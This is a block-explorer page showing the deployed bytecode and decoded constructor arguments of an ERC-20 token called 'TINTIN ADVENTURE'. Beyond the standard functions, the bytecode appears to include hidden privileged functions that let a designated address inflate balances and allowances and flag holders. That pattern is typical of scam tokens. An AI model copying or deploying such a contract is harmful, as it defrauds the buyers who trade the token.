0x608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a6116100975780639fb79737116100665780639fb79737146101f1578063a16a317914610204578063a9059cbb14610217578063dd62ed3e1461022a57600080fd5b8063715018a6146101b15780638da5cb5b146101bb578063905100c1146101d657806395d89b41146101e957600080fd5b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461017557806370a082311461018857600080fd5b806306fdde03146100fa578063095ea7b31461011857806318160ddd1461013b575b600080fd5b610102610263565b60405161010f9190610c13565b60405180910390f35b61012b610126366004610b1d565b6102f5565b604051901515815260200161010f565b6008545b60405190815260200161010f565b61012b61015b366004610aa0565b61030b565b60075460405160ff909116815260200161010f565b61012b610183366004610b1d565b610374565b61013f610196366004610a54565b6001600160a01b031660009081526001602052604090205490565b6101b96103aa565b005b6000546040516001600160a01b03909116815260200161010f565b6101b96101e4366004610adb565b610415565b610102610501565b6101b96101ff366004610b1d565b610510565b6101b9610212366004610b46565b610652565b61012b610225366004610b1d565b6106a3565b61013f610238366004610a6e565b6001600160a01b03918216600090815260046020908152604080832093909416825291909152205490565b60606005805461027290610c95565b80601f016020809104026020016040519081016040528092919081815260200182805461029e90610c95565b80156102eb5780601f106102c0576101008083540402835291602001916102eb565b820191906000526020600020905b8154815290600101906020018083116102ce57829003601f168201915b5050505050905090565b60006103023384846106c3565b50600192915050565b60006103188484846107eb565b61036a843361036585604051806060016040528060298152602001610d3f602991396001600160a01b038a16600090815260046020908152604080832033845290915290205491906109bc565b6106c3565b5060019392505050565b3360008181526004602090815260408083206001600160a01b0387168452909152812054909161030291859061036590866106b0565b6000546001600160a01b031633146104095760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b61041360006109e8565b565b336000818152600360205260408120546001600160a01b03168214156104a2576001600160a01b038083166000908152600460209081526040808320600383528184205490941683529290529081208054859290610474908490610c66565b90915550506001600160a01b0385166000908152600260205260409020805460ff19168515151790556104fa565b6001600160a01b038083166000908152600460209081526040808320938916835292905220546104d3908290610c66565b6001600160a01b038084166000908152600460209081526040808320938a16835292905220555b5050505050565b60606006805461027290610c95565b6001600160a01b0382166105585760405162461bcd60e51b815260206004820152600f60248201526e496e76616c6964206164647265737360881b6044820152606401610400565b6001600160a01b0380831660008181526003602052604081205490923392911614156105de576001600160a01b0381166000908152600160205260409020546105a2908390610c7e565b6001600160a01b0382166000908152600160205260409020556105c58383610c66565b6001600160a01b0385166000526001602052915061064c565b6001600160a01b038116600090815260016020526040902054610602908390610c7e565b6001600160a01b038083166000908152600160205260408082209390935590861681522054610632908390610c66565b6001600160a01b0385166000908152600160205260409020555b50505050565b3360005b835181101561064c576106918285838151811061068357634e487b7160e01b600052603260045260246000fd5b6020026020010151856107eb565b8061069b81610cd0565b915050610656565b60006103023384846107eb565b60006106bc8284610c66565b9392505050565b6001600160a01b0383166107275760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610400565b6001600160a01b0382166107895760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610400565b6001600160a01b0383811660008181526004602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166108505760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b6064820152608401610400565b6001600160a01b0382166108b25760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610400565b6001600160a01b03831660009081526002602052604090205460ff16156108fc576008546001600160a01b0384166000908152600160205260409020546108f99190610c66565b90505b61093981604051806060016040528060278152602001610d18602791396001600160a01b03861660009081526001602052604090205491906109bc565b6001600160a01b03808516600090815260016020526040808220939093559084168152205461096890826106b0565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906107de9085815260200190565b600081848411156109e05760405162461bcd60e51b81526004016104009190610c13565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b80356001600160a01b0381168114610a4f57600080fd5b919050565b600060208284031215610a65578081fd5b6106bc82610a38565b60008060408385031215610a80578081fd5b610a8983610a38565b9150610a9760208401610a38565b90509250929050565b600080600060608486031215610ab4578081fd5b610abd84610a38565b9250610acb60208501610a38565b9150604084013590509250925092565b600080600060608486031215610aef578283fd5b610af884610a38565b925060208401358015158114610b0c578283fd5b929592945050506040919091013590565b60008060408385031215610b2f578182fd5b610b3883610a38565b946020939093013593505050565b60008060408385031215610b58578182fd5b823567ffffffffffffffff80821115610b6f578384fd5b818501915085601f830112610b82578384fd5b8135602082821115610b9657610b96610d01565b8160051b604051601f19603f83011681018181108682111715610bbb57610bbb610d01565b604052838152828101945085830182870184018b1015610bd9578889fd5b8896505b84871015610c0257610bee81610a38565b865260019690960195948301948301610bdd565b509997909101359750505050505050565b6000602080835283518082850152825b81811015610c3f57858101830151858201604001528201610c23565b81811115610c505783604083870101525b50601f01601f1916929092016040019392505050565b60008219821115610c7957610c79610ceb565b500190565b600082821015610c9057610c90610ceb565b500390565b600181811c90821680610ca957607f821691505b60208210811415610cca57634e487b7160e01b600052602260045260246000fd5b50919050565b6000600019821415610ce457610ce4610ceb565b5060010190565b634e487b7160e01b600052601160045260246000fd5b634e487b7160e01b600052604160045260246000fdfe4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a264697066735822122095bdd2fe81a6c0a6fd14f59838bb4701aa0d7e48147329cc906917491b7967aa64736f6c63430008040033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000970f5b9928a7a2237c3e1e2caad57eed3f45dd8d000000000000000000000000000000000000000000000000000049ab483a1000000000000000000000000000000000000000000000000000000000000000001054494e54494e20414456454e5455524500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000654494e54494e0000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): TINTIN ADVENTURE
Arg [1] : symbol_ (string): TINTIN
Arg [2] : how_ (address): 0x970f5B9928a7a2237c3e1E2CAaD57EEd3f45DD8d
Arg [3] : totalSupply_ (uint256): 81000000000000

-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 000000000000000000000000970f5b9928a7a2237c3e1e2caad57eed3f45dd8d
Arg [3] : 000000000000000000000000000000000000000000000000000049ab483a1000
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000010
Arg [5] : 54494e54494e20414456454e5455524500000000000000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000006
Arg [7] : 54494e54494e0000000000000000000000000000000000000000000000000000


Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.